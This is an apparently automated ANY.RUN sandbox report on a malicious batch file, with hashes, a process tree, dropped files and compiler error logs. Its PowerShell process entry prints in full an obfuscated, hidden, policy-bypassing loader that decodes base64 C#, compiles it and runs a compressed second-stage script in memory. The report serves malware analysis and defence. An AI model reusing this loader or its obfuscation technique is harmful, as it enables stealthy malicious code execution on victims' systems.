File name: itlala.bat
Full analysis: https://app.any.run/tasks/f8fe8781-a27c-475b-bc10-36fd0b1621b4
Verdict: Malicious activity
Analysis date: October 14, 2019, 10:02:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5: FB05C57CD1936FFB0CEAB5BEAEFCCD3D
SHA1: B6017C7FABABEAC6169752BFF618980FEE00E06A
SHA256: 9D4E16A3F2632F42AF871B3B80BED7E1EA8F443EB7AED9E6EAA214784D3EB508
SSDEEP: 96:YwEYxbBpzZmyUT8vlNjAaNxQRA4MdYEk6UDP1FvO7EkQ0aWWfZ:5x3Ku5AavEA4l56UDP1I7bWfZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Starts Visual C# compiler
      • powershell.exe (PID: 2252)
    • Executes PowerShell scripts
      • cmd.exe (PID: 2744)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 2252)
  • INFO
    • Manual execution by user
      • explorer.exe (PID: 2580)
      • explorer.exe (PID: 2420)
No Malware configuration.
No data.
Total processes: 41
Monitored processes: 5
Malicious processes: 1
Suspicious processes: 0

Behavior graph

cmd.exe, powershell.exe, csc.exe, explorer.exe, explorer.exe

Process information

PID: 2744
CMD: cmd /c ""C:\Users\admin\AppData\Local\Temp\itlala.bat" "
Path: C:\Windows\system32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 2252
CMD: powersHeLl -nop -NonintErACti -Win 000000000000001 -exEcutioNpo bypASs .(('Set-'+'Va')+'ri'+('a'+'ble')) -Name ('dq') -Value ([Text.Encoding]::"\"Ut`F8"\"."\"Get`sT`RiNG"\"([Convert]::(('F'+'ro')+('m'+'Ba')+'se'+'64'+('S'+'tri'+'ng')).Invoke(('dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb'+'25zLk9iamVjd'+'E1vZGVsOw0KdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0K'+'dXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLklPLkNv'+'bXByZXNzaW9uOw0KDQpwdWJsaWMg'+'Y2xhc3MgSk9iVnpqQnlKd0lnRVBxd1lMdkxEZWFsVXtwdWJsaWMgc3RhdGljIHZvaWQgZFJhVVljT0NjRWZucUFHbUlsWktGY1Fucigpe1Bvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOw0Kc3RyaW5nIGZyZT0iSXdnQUFCK0xDQUFBQUFBQUJBQk5'+'sY2Z'+'PM0lv'+'TmhWL0Zpd3Y0TjVSWWRWVHVUb'+'TJrVWUvTjhFSjkxSHRGSGo3am0wMTJCQThKRUNSNHZpK05QLzQ5TURX'+'Zk90L3N5M1p5OWVkTC8ybXZWazUzRmg5bitmejE5WDhsSDQzVlZjUGlGN3ZTKzU5Y1hpaXh3eS9Pbk1mcTE2K1AydVdkYm9YMlA0bmYzMzZsZytibGx2UDc3NytmODlBbDhaTGp'+'tTzFZcjc3OCt2WTk4S0k1b3dhTU42RFpxQjlMN'+'2E5SHlW'+'MDRTKzZqM'+'Ex5R0RiT1Jqa'+'nZqcTI0'+'dmtRNVNZVFBrVjluQ1ZBYWk5WFkxSTBQUjYrUll0d0xmRVdESnhMUnZ'+'ZWnpiRGh5'+'Z1hoYW8valdBbnRnNkR4TnU0UTFZM09jQTQ3Z0lnRnM0bjZUS0d3Z'+'1JXVDJDMkVUSG9DNlZYUG41ZXRqcFpGQlJSd3dIYUw5elFpWDdRSkNqaHNqQlk2VnVvWXlaZXF'+'udVdKSWE0dUh1UUdVVVRIak5ROFNUeTRwcytTVUtycDNxeTc'+'0alJFe'+'TFIa1Y0V1pFdHNKT3QvR0NjZVphbmpyTENxRHRGQVNnazhvNVFEK21kaFhsbjkxTzNhZ0N2VWM4SmVmUkhMTDI5bmdtWE14K1ZuSGtZL2wxN3BVald0a25iMEpOVDJKbUVMbGwrTnB1ODkvQ1VTQmxFZ2NqeTdwSmx'+'mVGJ4TStsZFd6N0ppaVJBRi9Ua3Z1c0ltamhobG10S1'+'lRejlrRHRDMHNwWDU5RnIzTEVLczRrL2xKZWVITjVKY3U'+'4U0xEZkRwSFVES1JJaHVsWExpYUp1emJybHM4MmVFSzYybHlQSERCL0xTYzR4YytUK2dxUXpWa2t4M0tsQUxXa0ZWQ'+'1FSNHJrV2tTKytvcXNENEljUHhydkZkREVPVXdISEZyVmEzVXZ3WjV'+'rVFVzamFMNEJqT2dwbFZvNnNncWRieW9SRStXeVVZZ2UxaFNzbTdNdEt'+'XMHdKekNDTm5oc1pucnRu'+'Y2h5dTdnVmU2aVVWO'+'UcxRjZwOUx2UWt5ZnJqNm5mcE9jTTJOM3pNTTErSnpOcmNqZFpnNkx5MUNva1B6cGxFazl'+'xeTcwT1NaTWdzSHVKLzhoQkUwNFN'+'ZQXBIV1dRNC9kV'+'EpCMEZTQmVXRUlnNkh6UW43SGFPYmFob2wwR'+'2RCWnprYWFmNm1FaXpIRGVOMVVLaU45R3ZkUW5EOWllNU56eW16WTJYZHg2dkZHQ'+'0tVU3RkaFdodzZrWEwwcHUxN1NQMXcwb3JIWDBlM2R'+'hUlpvcDh3MVdnOG1TTTU4YVpncEhodHVQRFZCME1yRXlLUGVzd2tGZDBxcFNjZ3AxSHZNNlFqTnNVczJtRHQ1VHJJV'+'2RXMStrNWdQT0JMMC'+'92Mk'+'gwbStFL1l5Z29xcnlzamRMbWZmTFI1cnFaeDVOeUtyUzBJYmR5Qksxc2pCR1h5M1V6UXA2QjJKc1loZSs3TW'+'ppV2xBdkNFVzl'+'tVVB4M05nZ3'+'g3ejR2RzREWk'+'hGckk5ZjBvL1lLR3VFYmFPcGJndlV'+'2Y3QydTlqTjB1SHl6UTRMbHZhenpTRmk2bW1JTVFwUGpyaVJzWlBQTGRvVk44MXErcHpLVGxCdlFvSkdtR0xxT3RQRzU1dUJlRlFBaFNpUy9FWlV2cW9jTjZqTmV1THZsQnRqL29YblM4cW9GWElNbmlaTTBseXRGT'+'U5RSW9kVVRjR1hXMitENEhKZHdtYStzejdQQ'+'kpTYnBEaUVHZkp'+'LSyt5clZ4T1NERlNPZHNzeEIv'+'RUFSTFN4cFJ1Tnc2cmlRa1g4c05hdmNLSWF6dH'+'h4UDE3R'+'isrY2tYWVNOOHhEcmtCNEtDaStuN0MxanZDSkpxWHBMeVJucGl6MHdUWmV3VGlGcTBOMCsybV'+'hUSWp'+'kbzZIVDdVc1FxREdCZ0ZNVGtPRU5LbHRha3kyWVlpc2FJY1Z'+'lbVIxbUFrZk5Rc1NVclBtazR2OElsQ0NseWVpcGp5Zk1HS2M0aU01'+'NFBFQlljdml1Rm4rVWtMQ2JzSWNJU2wrTkR3TzVRdnoyV0RJRmZVNWc0L0pwTldRVUxzaDByZ1Zqa1ZIcTE0cXRuZ24yaU9KVTVXdnpJSzFLV045eXh'+'SU2FrSlVmVURyY3o4MUdhd1BTRzdBNmwyaytpVUU3dFZzQ2UyeERxcXNSZ21xRlVnai9hc1VNbEhFZGNVa0ZwWXk0Wk5pZHFJYmF0M1FOaXdEaHJnRG9aRnYrbzhkcUNFRjZzakhNWXNzZVlHRUE1d01IRTlnYVd4QTN2TGk3SVpjNjNPSnYreGU4UU'+'ZBNkprdVQ5Y2haamt1RkpWYU0zbHBaM3ZHeGlCeDdTYmN2Y'+'m'+'UxOUF4RU5ObjltYjI3VE1oN2xRTTZaVythRzVkSDBTRUMrV2l4VnEvaTBZcnRzOE5lM1RraTRoZ2tsMjd4L2drRlF3Mz'+'BCTVpHWUptWWp1dUJIR2pCTDVkcnphSmNjUUFDS2hvOWhB'+'bHh6b'+'1VLSEJKZlMramlBTk1TU0RiQjlwd0dJcWw5MmpldVliQTJvLzFkYjV1ckFkeXpKTVBrQWdL'+'WFk3M0pEK3hSdFl3bE9KaEhaMko2TjNFVms3en'+'gyaE42Rm0yQUdMQ1p'+'VTklhMmdqUzlFVkM'+'1SE'+'RmdThBU3lSYlR1eERCWVc5OUpteXAzSWJLWE5tQm1NcGROMmdQYU4xSjV2dTNILy8'+'2dFlUMitnZk93eDhBanpOdkw2K2gveWUyOG1XcEJxM1RPZjdEMlN4bmh6ODVlL254'+'NlhMeWMvMlphK3pBVlZyNVVlbUZmV'+'lUvZnZ5Y1AyaGZoMXpqdm43ODUrZlh0Ny9zTjk4cVZmWUwvZzM4dFlqNS8yTDBOL0Q5L1A3anZ3cVE3VFFqQ0FBQSI7DQpieXRlW10gZ1ppcEJ1ZmZlcjIgPSBDb252Z'+'XJ0LkZyb21CYXNlNjRTdHJpbm'+'coZnJlKTt1c2luZyAodmFyIG1lbW9yeVN0cmVhbSA9IG5ldyBNZW1vcnlTdHJlYW0oKSl7aW50IGRhdGFMZW5ndGggPSBCaXRDb252ZXJ0ZXIuVG9JbnQzMihnWmlwQnVmZmVyMiwgMCk7bWVtb3J5U3RyZWFtLldyaXRlKGdaaXBCdWZmZXIyLCA0L'+'CBnWmlwQnVmZmVyMi5MZW5ndGggLSA0KTt2YXIgYnVmZmVyID0gbmV3IGJ5dG'+'VbZGF0YUxlbmd0aF07'+'bWVtb3J5U3RyZWFtLlBvc2l0aW9uID0gMDt1c2luZyAodmFyIGdaaXBTdHJlYW0gPSB'+'uZXcgR1ppcFN0'+'cmVhbShtZW1vcnlTdHJlYW0sI'+'ENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzKSl7Z1pp'+'cFN0cmVhbS5SZWFkKGJ1ZmZlciwgMCwgYnVmZmVyLkxlbmd0aCk7fWZyZT0oRW5jb2RpbmcuVVRGOC5HZXRTdHJpbmcoYnVmZmVyKSk7fQ0KcHMuQWRkU2Ny'+'aXB0KGZyZSk7cHMuSW52b2tlKCk7fX0='))));.('Ad'+('d-T'+'ype')) -TypeDefinition ${dQ};[JObVzjByJwIgEPqwYLvLDealU]::('d'+('R'+'aUY'+'cOC')+('cE'+'fnq')+'AG'+'mI'+('lZ'+'KFcQnr')).Invoke()
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID: 2440
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 1
Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
PID: 2420
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID: 2580
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 279
Read events: 224
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 0

Dropped files

PID: 2252 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVXUH64Q0M6M2DSKZ9P.temp
MD5:
SHA256:

PID: 2440 (csc.exe)
Filename: C:\Users\admin\AppData\Local\Temp\ijmcfqca.pdb
MD5:
SHA256:

PID: 2440 (csc.exe)
Filename: C:\Users\admin\AppData\Local\Temp\ijmcfqca.out
MD5:
SHA256:

PID: 2252 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 35375F3D71AE42AA9777154D256B33BF
SHA256: BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF

PID: 2252 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a6e9.TMP
Type: binary
MD5: 35375F3D71AE42AA9777154D256B33BF
SHA256: BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF

PID: 2252 (powershell.exe)
Filename: C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline
Type: text
MD5: EB06EA4803DD2B690C2161FECFB71E12
SHA256: 02DCDDBA38B22BF70450534D54589A23652FE1EA19DF8EA6C98ABFDD27D827B0

PID: 2252 (powershell.exe)
Filename: C:\Users\admin\AppData\Local\Temp\ijmcfqca.0.cs
Type: text
MD5: 03D5D9EEE5C82DFD30330B80FF0E58E9
SHA256: 1A25B6E5B17421FAC5BF765671E268DFAC0B8C0C669A4742A2D369EA01BDCB5B
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 0
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

No data

Threats

No threats detected
Process: Message
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe: *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144